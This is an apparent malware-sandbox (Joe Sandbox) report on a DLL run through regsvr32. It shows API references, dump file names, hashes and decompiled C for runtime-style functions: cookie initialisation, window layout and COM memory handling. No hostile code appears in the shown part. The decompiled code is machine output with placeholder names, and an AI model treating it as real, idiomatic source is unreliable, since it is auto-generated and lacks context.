                                                                        • FlsGetValue.KERNEL32(?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?,10041D40), ref: 100151AD
                                                                        • SetLastError.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 10015203
                                                                          • Part of subcall function 1001382A: __lock.LIBCMT ref: 1001386E
                                                                          • Part of subcall function 1001382A: RtlAllocateHeap.NTDLL(00000008,?,10041E40,00000010,100151C5,00000001,0000008C,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000), ref: 100138AC
                                                                        • FlsSetValue.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 100151D4
                                                                        • GetCurrentThreadId.KERNEL32 ref: 100151EC
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastValue$AllocateCurrentHeapThread__lock
                                                                        • String ID:
                                                                        • API String ID: 1487844433-0
                                                                        • Opcode ID: b2f315a77b2b4df7a3c1e85649ddbe99070d14f731bb33650b41be055e3ed3d9
                                                                        • Instruction ID: 04c9e0168ef1b4a2d5000d056184ae8950552c627320cfc90ecd4b0af594dd98
                                                                        • Opcode Fuzzy Hash: b2f315a77b2b4df7a3c1e85649ddbe99070d14f731bb33650b41be055e3ed3d9
                                                                        • Instruction Fuzzy Hash: F4F0C2326017269FE3225F648C49E463BE0EB017A2F104219F942CE1E1DFB5C8808794
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10016B44 Relevance: 7.5, APIs: 5, Instructions: 32timethreadCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10016B44() {
				struct _FILETIME _v12;
				signed int _v16;
				union _LARGE_INTEGER _v20;
				signed int _t7;
				signed int _t9;
				signed int _t10;
				signed int _t11;
				signed int _t15;
				signed int _t22;

				_t7 =  *0x1004c470; // 0x303bb91f
				if(_t7 == 0 || _t7 == 0xbb40e64e) {
					GetSystemTimeAsFileTime( &_v12);
					_t9 = GetCurrentProcessId();
					_t10 = GetCurrentThreadId();
					_t11 = GetTickCount();
					QueryPerformanceCounter( &_v20);
					_t15 = _v16 ^ _v20.LowPart;
					_t22 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t9 ^ _t10 ^ _t11 ^ _t15;
					 *0x1004c470 = _t22;
					if(_t22 == 0) {
						 *0x1004c470 = 0xbb40e64e;
					}
					return _t15;
				}
				return _t7;
			}












                                                                        0x10016b4a
                                                                        0x10016b51
                                                                        0x10016b5f
                                                                        0x10016b6b
                                                                        0x10016b73
                                                                        0x10016b7b
                                                                        0x10016b87
                                                                        0x10016b90
                                                                        0x10016b93
                                                                        0x10016b95
                                                                        0x10016b9b
                                                                        0x10016b9d
                                                                        0x10016b9d
                                                                        0x00000000
                                                                        0x10016ba7
                                                                        0x10016ba9

                                                                        APIs
                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 10016B5F
                                                                        • GetCurrentProcessId.KERNEL32 ref: 10016B6B
                                                                        • GetCurrentThreadId.KERNEL32 ref: 10016B73
                                                                        • GetTickCount.KERNEL32 ref: 10016B7B
                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 10016B87
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                        • String ID:
                                                                        • API String ID: 1445889803-0
                                                                        • Opcode ID: c4e665b203c20cf87cd8f2106384ef992f2c3d3f5cabc43c5d4d3063469ed334
                                                                        • Instruction ID: 11add00fd643567121de8b49d98352c3af742b412758f19a40badcee8712c011
                                                                        • Opcode Fuzzy Hash: c4e665b203c20cf87cd8f2106384ef992f2c3d3f5cabc43c5d4d3063469ed334
                                                                        • Instruction Fuzzy Hash: 21F0FF72C012289FDB11DBF5CE8899AB7F8FF4E355B820551D841EB111DB30D9419B80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002C1A7 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 310COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 63%
                                                                        			E1002C1A7(intOrPtr* __ecx, intOrPtr* _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				signed int _v32;
				struct tagRECT _v48;
				signed int _v52;
				signed int _v56;
				struct tagRECT _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t170;
				signed int _t171;
				intOrPtr* _t172;
				signed int _t175;
				signed int _t177;
				intOrPtr* _t179;
				signed char _t183;
				signed int _t184;
				signed int _t186;
				intOrPtr* _t200;
				intOrPtr* _t204;
				signed int _t220;
				intOrPtr* _t223;
				signed char _t233;
				signed int _t247;
				signed int _t249;
				signed int _t258;
				signed int _t261;
				signed int _t266;
				signed int _t268;
				intOrPtr _t270;
				signed int _t273;
				intOrPtr _t275;
				signed int _t277;
				intOrPtr* _t282;

				_t268 = 0;
				_push(0);
				_t223 = __ecx;
				_push(0);
				_push(0x418);
				_v16 = 0;
				_v56 = 0;
				_v52 = 0;
				_t277 =  *((intOrPtr*)( *__ecx + 0x110))();
				_v32 = _t277;
				if(_t277 != 0) {
					_t175 = E1001F77E(_t277 + _t277 * 4 << 2);
					_v16 = _t175;
					if(_t277 > 0) {
						_v12 = _t175;
						do {
							E1002B71F(_t223, _t268, _v12);
							_v12 = _v12 + 0x14;
							_t268 = _t268 + 1;
						} while (_t268 < _t277);
						_t270 = _v16;
						_t177 = 0;
						if(_t277 > 0) {
							_t233 =  *(_t223 + 0x7c);
							if((_t233 & 0x00000002) == 0) {
								_t266 = _t233 & 0x00000004;
								_v48.bottom = _t266;
								if(_t266 == 0) {
									L19:
									_push(_t177);
									asm("sbb eax, eax");
									_t177 =  ~(_a8 & 0x00000002) & 0x00007fff;
									__eflags = _t177;
									goto L20;
								} else {
									if((_a8 & 0x00000004) != 0) {
										L18:
										_push(_t177);
										_push( *((intOrPtr*)(_t223 + 0x6c)));
									} else {
										if((_a8 & 0x00000008) == 0) {
											__eflags = _a8 & 0x00000010;
											if((_a8 & 0x00000010) == 0) {
												__eflags = _a12 - 0xffffffff;
												if(_a12 == 0xffffffff) {
													__eflags = _t233 & 0x00000001;
													if((_t233 & 0x00000001) == 0) {
														goto L19;
													} else {
														goto L18;
													}
												} else {
													SetRectEmpty( &_v48);
													 *((intOrPtr*)( *_t223 + 0x13c))( &_v48, _a8 & 0x00000002);
													_t220 = _a8 & 0x00000020;
													__eflags = _t220;
													if(_t220 == 0) {
														_t258 = _v48.right - _v48.left;
														__eflags = _t258;
													} else {
														_t258 = _v48.bottom - _v48.top;
													}
													_push(_t220);
													_push(_t258 + _a12);
												}
											} else {
												_push(0);
												L20:
												_push(_t177);
											}
										} else {
											_push(0);
											_push(0x7fff);
										}
									}
								}
								_push(_t277);
								_push(_t270);
								E1002BCF4(_t223, _t266);
							}
							_push(_t277);
							_push(_t270);
							_push( &(_v48.right));
							_t179 = E1002BBD2(_t223);
							_v56 =  *_t179;
							_v52 =  *((intOrPtr*)(_t179 + 4));
							if((_a8 & 0x00000040) != 0) {
								_t261 = 0;
								_v8 = 0;
								_a12 = 0;
								_v48.bottom =  *((intOrPtr*)(_t223 + 0x9c));
								 *((intOrPtr*)(_t223 + 0x9c)) = 0;
								if(_t277 > 0) {
									_t200 = _t270 + 4;
									_v24 = _t200;
									_t247 = _t277;
									do {
										if(( *(_t200 + 5) & 0x00000001) != 0 &&  *_t200 != 0) {
											_t261 = _t261 + 1;
										}
										_t200 = _t200 + 0x14;
										_t247 = _t247 - 1;
									} while (_t247 != 0);
									_a12 = _t261;
									if(_t261 > 0) {
										_t273 = E1001F77E(_t261 + _t261 * 2 << 3);
										if(_t273 == 0) {
											_t64 =  &_v8;
											 *_t64 = _v8 & 0x00000000;
											__eflags =  *_t64;
										} else {
											E1002B8AD(_t273, 0x18, _a12, 0x1002be80);
											_v8 = _t273;
										}
										_a12 = _a12 & 0x00000000;
										_v12 = _v12 & 0x00000000;
										_t204 = _v24;
										_t275 = _v8 + 8;
										_v20 = _t275;
										_v24 = _t204;
										do {
											if(( *(_t204 + 5) & 0x00000001) != 0 &&  *_t204 != 0) {
												_t249 = _v12;
												 *((intOrPtr*)(_t275 - 8)) = _t249;
												 *((intOrPtr*)(_t275 - 4)) =  *_t204;
												 *((intOrPtr*)( *_t223 + 0x16c))(_t249,  &_v72);
												E10028E96(_t223,  &_v72);
												_a12 = _a12 + 1;
												_v20 = _v20 + 0x18;
												_t204 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t277 = _v32;
												_t275 = _v20;
											}
											_v12 = _v12 + 1;
											_t204 = _t204 + 0x14;
											_v24 = _t204;
										} while (_v12 < _t277);
									}
								}
								_t183 =  *(_t223 + 0x7c);
								if((_t183 & 0x00000001) != 0 && (_t183 & 0x00000004) != 0) {
									 *((intOrPtr*)(_t223 + 0x6c)) = _v56;
								}
								_t271 = 0;
								_t307 = _t277;
								if(_t277 > 0) {
									_v20 = _v16;
									do {
										E1002B9F8(_t223, _t223, _t271, _t277, _t307, _t271, _v20);
										_v20 = _v20 + 0x14;
										_t271 = _t271 + 1;
									} while (_t271 < _t277);
								}
								_t184 = _a12;
								if(_t184 > 0) {
									_t282 = _v8 + 8;
									_a12 = _t184;
									do {
										_t186 = E10020230(_t223,  *((intOrPtr*)(_t282 - 4)));
										_v32 = _t186;
										if(_t186 != 0) {
											GetWindowRect( *(_t186 + 0x1c),  &_v72);
											_t271 = _v72.left -  *_t282;
											_v24 = _v72.top -  *((intOrPtr*)(_t282 + 4));
											 *((intOrPtr*)( *_t223 + 0x16c))( *((intOrPtr*)(_t282 - 8)),  &_v72);
											E100204FE(_v32, 0, _v72.left + _v72.left -  *_t282, _v24 + _v72.top, 0, 0, 0x15);
										}
										_t282 = _t282 + 0x18;
										_t125 =  &_a12;
										 *_t125 = _a12 - 1;
										_t313 =  *_t125;
									} while ( *_t125 != 0);
									_push(_v8);
									L1001F7A9(_t223, _t271, _t282, _t313);
								}
								_t270 = _v16;
								 *((intOrPtr*)(_t223 + 0x9c)) = _v48.bottom;
							}
							_push(_t270);
							L1001F7A9(_t223, _t270, _t277, _t313);
						}
					}
				}
				SetRectEmpty( &_v72);
				 *((intOrPtr*)( *_t223 + 0x13c))( &_v72, _a8 & 0x00000002);
				_v52 = _v52 + _v72.top - _v72.bottom;
				_v56 = _v56 + _v72.left - _v72.right;
				E1002F49A( &(_v48.right), _a8 & 0x00000001, _a8 & 0x00000002);
				_t170 = _v48.right;
				if(_v56 <= _t170) {
					_v56 = _t170;
				}
				_t171 = _v48.bottom;
				if(_v52 <= _t171) {
					_v52 = _t171;
				}
				_t172 = _a4;
				 *_t172 = _v56;
				 *(_t172 + 4) = _v52;
				return _t172;
			}










































                                                                        0x1002c1b0
                                                                        0x1002c1b2
                                                                        0x1002c1b3
                                                                        0x1002c1b7
                                                                        0x1002c1b8
                                                                        0x1002c1bd
                                                                        0x1002c1c0
                                                                        0x1002c1c3
                                                                        0x1002c1cc
                                                                        0x1002c1d2
                                                                        0x1002c1d5
                                                                        0x1002c1e2
                                                                        0x1002c1ea
                                                                        0x1002c1ed
                                                                        0x1002c1f3
                                                                        0x1002c1f6
                                                                        0x1002c1fc
                                                                        0x1002c201
                                                                        0x1002c205
                                                                        0x1002c206
                                                                        0x1002c20a
                                                                        0x1002c20d
                                                                        0x1002c211
                                                                        0x1002c217
                                                                        0x1002c21d
                                                                        0x1002c225
                                                                        0x1002c228
                                                                        0x1002c22b
                                                                        0x1002c299
                                                                        0x1002c299
                                                                        0x1002c2a1
                                                                        0x1002c2a3
                                                                        0x1002c2a3
                                                                        0x00000000
                                                                        0x1002c22d
                                                                        0x1002c231
                                                                        0x1002c293
                                                                        0x1002c293
                                                                        0x1002c294
                                                                        0x1002c233
                                                                        0x1002c237
                                                                        0x1002c241
                                                                        0x1002c245
                                                                        0x1002c24a
                                                                        0x1002c24e
                                                                        0x1002c28e
                                                                        0x1002c291
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002c250
                                                                        0x1002c254
                                                                        0x1002c269
                                                                        0x1002c272
                                                                        0x1002c272
                                                                        0x1002c275
                                                                        0x1002c282
                                                                        0x1002c282
                                                                        0x1002c277
                                                                        0x1002c27a
                                                                        0x1002c27a
                                                                        0x1002c285
                                                                        0x1002c28b
                                                                        0x1002c28b
                                                                        0x1002c247
                                                                        0x1002c247
                                                                        0x1002c2a8
                                                                        0x1002c2a8
                                                                        0x1002c2a8
                                                                        0x1002c239
                                                                        0x1002c239
                                                                        0x1002c23a
                                                                        0x1002c23a
                                                                        0x1002c237
                                                                        0x1002c231
                                                                        0x1002c2a9
                                                                        0x1002c2ac
                                                                        0x1002c2ad
                                                                        0x1002c2ad
                                                                        0x1002c2b2
                                                                        0x1002c2b3
                                                                        0x1002c2b7
                                                                        0x1002c2ba
                                                                        0x1002c2c8
                                                                        0x1002c2cb
                                                                        0x1002c2ce
                                                                        0x1002c2da
                                                                        0x1002c2de
                                                                        0x1002c2e1
                                                                        0x1002c2e4
                                                                        0x1002c2e7
                                                                        0x1002c2ed
                                                                        0x1002c2f3
                                                                        0x1002c2f6
                                                                        0x1002c2f9
                                                                        0x1002c2fb
                                                                        0x1002c2ff
                                                                        0x1002c306
                                                                        0x1002c306
                                                                        0x1002c307
                                                                        0x1002c30a
                                                                        0x1002c30a
                                                                        0x1002c30f
                                                                        0x1002c312
                                                                        0x1002c324
                                                                        0x1002c329
                                                                        0x1002c340
                                                                        0x1002c340
                                                                        0x1002c340
                                                                        0x1002c32b
                                                                        0x1002c336
                                                                        0x1002c33b
                                                                        0x1002c33b
                                                                        0x1002c347
                                                                        0x1002c34b
                                                                        0x1002c34f
                                                                        0x1002c352
                                                                        0x1002c355
                                                                        0x1002c358
                                                                        0x1002c35b
                                                                        0x1002c35f
                                                                        0x1002c366
                                                                        0x1002c369
                                                                        0x1002c372
                                                                        0x1002c37a
                                                                        0x1002c386
                                                                        0x1002c38b
                                                                        0x1002c38e
                                                                        0x1002c392
                                                                        0x1002c398
                                                                        0x1002c399
                                                                        0x1002c39a
                                                                        0x1002c39b
                                                                        0x1002c39c
                                                                        0x1002c39f
                                                                        0x1002c39f
                                                                        0x1002c3a2
                                                                        0x1002c3a5
                                                                        0x1002c3ab
                                                                        0x1002c3ab
                                                                        0x1002c35b
                                                                        0x1002c312
                                                                        0x1002c3b0
                                                                        0x1002c3b5
                                                                        0x1002c3be
                                                                        0x1002c3be
                                                                        0x1002c3c1
                                                                        0x1002c3c3
                                                                        0x1002c3c5
                                                                        0x1002c3ca
                                                                        0x1002c3cd
                                                                        0x1002c3d3
                                                                        0x1002c3d8
                                                                        0x1002c3dc
                                                                        0x1002c3dd
                                                                        0x1002c3cd
                                                                        0x1002c3e1
                                                                        0x1002c3e6
                                                                        0x1002c3eb
                                                                        0x1002c3ee
                                                                        0x1002c3f1
                                                                        0x1002c3f6
                                                                        0x1002c3fd
                                                                        0x1002c400
                                                                        0x1002c409
                                                                        0x1002c417
                                                                        0x1002c425
                                                                        0x1002c42c
                                                                        0x1002c44b
                                                                        0x1002c44b
                                                                        0x1002c450
                                                                        0x1002c453
                                                                        0x1002c453
                                                                        0x1002c453
                                                                        0x1002c453
                                                                        0x1002c458
                                                                        0x1002c45b
                                                                        0x1002c460
                                                                        0x1002c464
                                                                        0x1002c467
                                                                        0x1002c467
                                                                        0x1002c46d
                                                                        0x1002c46e
                                                                        0x1002c473
                                                                        0x1002c211
                                                                        0x1002c1ed
                                                                        0x1002c478
                                                                        0x1002c48d
                                                                        0x1002c49a
                                                                        0x1002c4a5
                                                                        0x1002c4b3
                                                                        0x1002c4b8
                                                                        0x1002c4c1
                                                                        0x1002c4c3
                                                                        0x1002c4c3
                                                                        0x1002c4c6
                                                                        0x1002c4cc
                                                                        0x1002c4ce
                                                                        0x1002c4ce
                                                                        0x1002c4d1
                                                                        0x1002c4d7
                                                                        0x1002c4dc
                                                                        0x1002c4e0

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Empty$Window
                                                                        • String ID: @
                                                                        • API String ID: 444217639-2766056989
                                                                        • Opcode ID: 0f88fdd43cf5bce15e433ab0bc4ef339b59204e985663dc88836f237ddcb939b
                                                                        • Instruction ID: 58262607db454327f65a07b4950f04bdf16dc99993eabd06514925c449a16dc0
                                                                        • Opcode Fuzzy Hash: 0f88fdd43cf5bce15e433ab0bc4ef339b59204e985663dc88836f237ddcb939b
                                                                        • Instruction Fuzzy Hash: 11C13972D00209DFCB05CFA8D994EAEB7F5FF48350F518569E815AB251DB34AE05CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000E14F Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 297memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 80%
                                                                        			E1000E14F(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr _t130;
				intOrPtr* _t133;
				intOrPtr* _t140;
				intOrPtr* _t143;
				intOrPtr _t144;
				signed int _t146;
				intOrPtr* _t147;
				void* _t149;
				intOrPtr* _t153;
				signed int _t158;
				intOrPtr _t159;
				intOrPtr* _t161;
				intOrPtr* _t163;
				intOrPtr* _t165;
				intOrPtr* _t166;
				intOrPtr _t169;
				intOrPtr* _t170;
				intOrPtr* _t172;
				intOrPtr _t174;
				signed int _t178;
				signed int _t180;
				signed int _t186;
				signed int _t188;
				intOrPtr* _t190;
				intOrPtr* _t192;
				intOrPtr _t196;
				intOrPtr _t198;
				intOrPtr* _t199;
				void* _t200;
				intOrPtr _t213;
				intOrPtr* _t215;
				intOrPtr* _t261;
				void* _t263;

				E10011BF0(0x1003af36, _t263);
				_t130 =  *0x1004c470; // 0x303bb91f
				_t261 = __ecx;
				 *((intOrPtr*)(_t263 - 0x10)) = _t130;
				 *((intOrPtr*)(_t263 - 0x88)) =  *((intOrPtr*)(__ecx + 0x14));
				 *((intOrPtr*)(_t263 - 0x80)) =  *((intOrPtr*)(__ecx + 0x10));
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					_t133 =  *((intOrPtr*)(__ecx + 8));
					if(_t133 != 0) {
						_push(_t263 - 0x7c);
						_push(_t263 - 0x78);
						_push(0x10043008);
						_push(_t133);
						if( *((intOrPtr*)( *_t133 + 0xc))() >= 0) {
							E1000B1A4(_t263 - 0x70, 0x10043744);
							 *(_t263 - 0x50) =  *(_t263 - 0x50) | 0xffffffff;
							 *((intOrPtr*)(_t263 - 0x58)) = 0;
							 *((intOrPtr*)(_t263 - 0x54)) = 0;
							 *((intOrPtr*)(_t263 - 0x4c)) = 0x18;
							 *((intOrPtr*)(_t263 - 0x48)) = 0;
							 *((intOrPtr*)(_t263 - 0x44)) = 0x1fb;
							E1000B1A4(_t263 - 0x40, 0x1004372c);
							_t140 =  *((intOrPtr*)(_t263 - 0x78));
							 *(_t263 - 0x20) =  *(_t263 - 0x20) | 0xffffffff;
							 *((intOrPtr*)(_t263 - 0x28)) = 0x1c;
							 *((intOrPtr*)(_t263 - 0x24)) = 0;
							 *((intOrPtr*)(_t263 - 0x1c)) = 0x20;
							 *((intOrPtr*)(_t263 - 0x18)) = 0;
							 *((intOrPtr*)(_t263 - 0x14)) = 0x1e;
							_t196 =  *((intOrPtr*)( *_t140 + 0x10))(_t140, 2, _t263 - 0x70, 0x28, 0);
							if(_t196 >= 0) {
								 *(_t263 - 0xa0) =  *(_t263 - 0x7c);
								_t143 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)(_t263 - 0x9c)) = 1;
								 *(_t263 - 0x98) = 0;
								 *((intOrPtr*)(_t263 - 0x94)) = 0;
								 *((intOrPtr*)(_t263 - 0x90)) = 0;
								_t144 =  *((intOrPtr*)( *_t143 + 0x18))(_t143, 0, 0, _t263 - 0xa0);
								 *((intOrPtr*)(_t263 - 0x84)) = _t144;
								if(_t144 >= 0) {
									 *(_t261 + 0x14) =  *(_t263 - 0x98);
									_t146 =  *(_t263 - 0x8c);
									 *(_t263 - 0x7c) = _t146;
									 *(_t261 + 0x10) = _t146;
									_t147 =  *((intOrPtr*)(_t263 - 0x78));
									 *((intOrPtr*)(_t261 + 0x34)) =  *((intOrPtr*)(_t263 - 0x94));
									 *((intOrPtr*)( *_t147 + 8))(_t147);
									goto L23;
								} else {
									_t161 =  *((intOrPtr*)(_t263 - 0x78));
									 *((intOrPtr*)( *_t161 + 8))(_t161);
								}
								goto L41;
							} else {
								_t163 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)( *_t163 + 8))(_t163);
								_t134 = _t196;
							}
						}
					} else {
						_t134 = 0;
					}
				} else {
					_t165 =  *((intOrPtr*)(__ecx + 0x4c));
					_t134 =  *((intOrPtr*)( *_t165 + 0x14))(_t165, 0x10043228, _t263 - 0x74);
					 *((intOrPtr*)(_t263 - 0x84)) = _t134;
					if(_t134 >= 0) {
						_t166 =  *((intOrPtr*)(_t263 - 0x74));
						_push(_t263 - 0x7c);
						_push(0x10043208);
						_push(_t166);
						if( *((intOrPtr*)( *_t166))() >= 0) {
							_t186 =  *(_t263 - 0x7c);
							_push(_t263 - 0x78);
							_push(0x10043348);
							 *((intOrPtr*)(_t263 - 0x78)) = 0;
							_push(_t186);
							if( *((intOrPtr*)( *_t186 + 0x10))() >= 0) {
								_t190 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)( *_t190 + 0x14))(_t190,  *((intOrPtr*)(__ecx + 4)) + 0xe4, __ecx + 0x58);
								_t192 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)( *_t192 + 8))(_t192);
							}
							_t188 =  *(_t263 - 0x7c);
							 *((intOrPtr*)( *_t188 + 8))(_t188);
						}
						if(E1001F77E(0x14) == 0) {
							_t169 = 0;
						} else {
							_t169 = E1000D069(_t168,  *((intOrPtr*)(_t263 - 0x74)));
						}
						 *((intOrPtr*)(_t261 + 0x50)) = _t169;
						_t170 =  *((intOrPtr*)(_t263 - 0x74));
						 *((intOrPtr*)( *_t170 + 8))(_t170);
						_t172 =  *((intOrPtr*)(_t261 + 0x50));
						_t229 =  *_t172;
						if( *_t172 != 0) {
							E1000B427(_t229, _t172 + 4);
						}
						if(E1001F77E(0x28) == 0) {
							_t174 = 0;
						} else {
							_t174 = E10009E9C(_t173, 0, 0x1f40);
						}
						 *((intOrPtr*)(_t261 + 0x54)) = _t174;
						E1000DB7F(_t174);
						 *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x50)) + 8)) =  *((intOrPtr*)(_t261 + 0x54));
						_t178 =  *( *((intOrPtr*)(_t261 + 0x54)) + 0xc);
						 *(_t261 + 0x10) = _t178;
						_t180 = _t178 + _t178 * 4 << 3;
						__imp__CoTaskMemAlloc(_t180,  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x50)))));
						 *(_t261 + 0x14) = _t180;
						E10011C50(_t180, 0,  *(_t261 + 0x10) +  *(_t261 + 0x10) * 4 << 3);
						E1000DA69( *((intOrPtr*)(_t261 + 0x50)));
						E1000B3E4( *((intOrPtr*)(_t261 + 0x50)));
						L23:
						 *((intOrPtr*)(_t263 - 0x74)) = 0;
						if( *(_t261 + 0x10) > 0) {
							_t200 = 0;
							do {
								_t158 = E1001F77E(0x1c);
								 *(_t263 - 0x7c) = _t158;
								 *(_t263 - 4) = 0;
								if(_t158 == 0) {
									_t159 = 0;
								} else {
									_t159 = E1001E0EA(_t158, 0xa);
								}
								 *(_t263 - 4) =  *(_t263 - 4) | 0xffffffff;
								 *((intOrPtr*)(_t263 - 0x74)) =  *((intOrPtr*)(_t263 - 0x74)) + 1;
								 *((intOrPtr*)(_t200 +  *(_t261 + 0x14) + 0x24)) = _t159;
								_t200 = _t200 + 0x28;
							} while ( *((intOrPtr*)(_t263 - 0x74)) <  *(_t261 + 0x10));
						}
						_t198 =  *((intOrPtr*)(_t263 - 0x88));
						if(_t198 != 0) {
							if( *((intOrPtr*)(_t263 - 0x80)) > 0) {
								_t149 = 0xffffffdc;
								_t199 = _t198 + 0x24;
								 *((intOrPtr*)(_t263 - 0x74)) =  *((intOrPtr*)(_t263 - 0x80));
								 *(_t263 - 0x7c) = _t149 -  *((intOrPtr*)(_t263 - 0x88));
								while(1) {
									_t213 =  *((intOrPtr*)( *_t199 + 4));
									 *((intOrPtr*)(_t263 - 0x80)) = _t213;
									if(_t213 == 0) {
										goto L37;
									}
									while(1) {
										_t153 = E10006D96(_t263 - 0x80);
										 *((intOrPtr*)( *_t261 + 8))( *_t153, 1);
										if( *((intOrPtr*)(_t263 - 0x80)) == 0) {
											goto L37;
										}
									}
									L37:
									E1001E047( *_t199);
									_t215 =  *_t199;
									if(_t215 != 0) {
										 *((intOrPtr*)( *_t215 + 4))(1);
									}
									_t199 = _t199 + 0x28;
									_t122 = _t263 - 0x74;
									 *_t122 =  *((intOrPtr*)(_t263 - 0x74)) - 1;
									if( *_t122 != 0) {
										continue;
									}
									goto L40;
								}
							}
							L40:
							__imp__CoTaskMemFree( *((intOrPtr*)(_t263 - 0x88)));
						}
						L41:
						_t134 =  *((intOrPtr*)(_t263 - 0x84));
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t263 - 0xc));
				return E100117AE(_t134,  *((intOrPtr*)(_t263 - 0x10)));
			}




































                                                                        0x1000e154
                                                                        0x1000e15f
                                                                        0x1000e166
                                                                        0x1000e168
                                                                        0x1000e16f
                                                                        0x1000e17d
                                                                        0x1000e180
                                                                        0x1000e2ad
                                                                        0x1000e2b2
                                                                        0x1000e2c0
                                                                        0x1000e2c4
                                                                        0x1000e2c5
                                                                        0x1000e2ca
                                                                        0x1000e2d0
                                                                        0x1000e2e1
                                                                        0x1000e2e6
                                                                        0x1000e2f5
                                                                        0x1000e2f8
                                                                        0x1000e2fb
                                                                        0x1000e302
                                                                        0x1000e305
                                                                        0x1000e30c
                                                                        0x1000e311
                                                                        0x1000e314
                                                                        0x1000e321
                                                                        0x1000e328
                                                                        0x1000e32b
                                                                        0x1000e332
                                                                        0x1000e335
                                                                        0x1000e342
                                                                        0x1000e346
                                                                        0x1000e365
                                                                        0x1000e36b
                                                                        0x1000e371
                                                                        0x1000e37b
                                                                        0x1000e381
                                                                        0x1000e387
                                                                        0x1000e390
                                                                        0x1000e395
                                                                        0x1000e39b
                                                                        0x1000e3b7
                                                                        0x1000e3ba
                                                                        0x1000e3c0
                                                                        0x1000e3c3
                                                                        0x1000e3c6
                                                                        0x1000e3c9
                                                                        0x1000e3cf
                                                                        0x00000000
                                                                        0x1000e39d
                                                                        0x1000e39d
                                                                        0x1000e3a3
                                                                        0x1000e3a3
                                                                        0x00000000
                                                                        0x1000e348
                                                                        0x1000e348
                                                                        0x1000e34e
                                                                        0x1000e351
                                                                        0x1000e351
                                                                        0x1000e346
                                                                        0x1000e2b4
                                                                        0x1000e2b4
                                                                        0x1000e2b4
                                                                        0x1000e186
                                                                        0x1000e186
                                                                        0x1000e195
                                                                        0x1000e19a
                                                                        0x1000e1a0
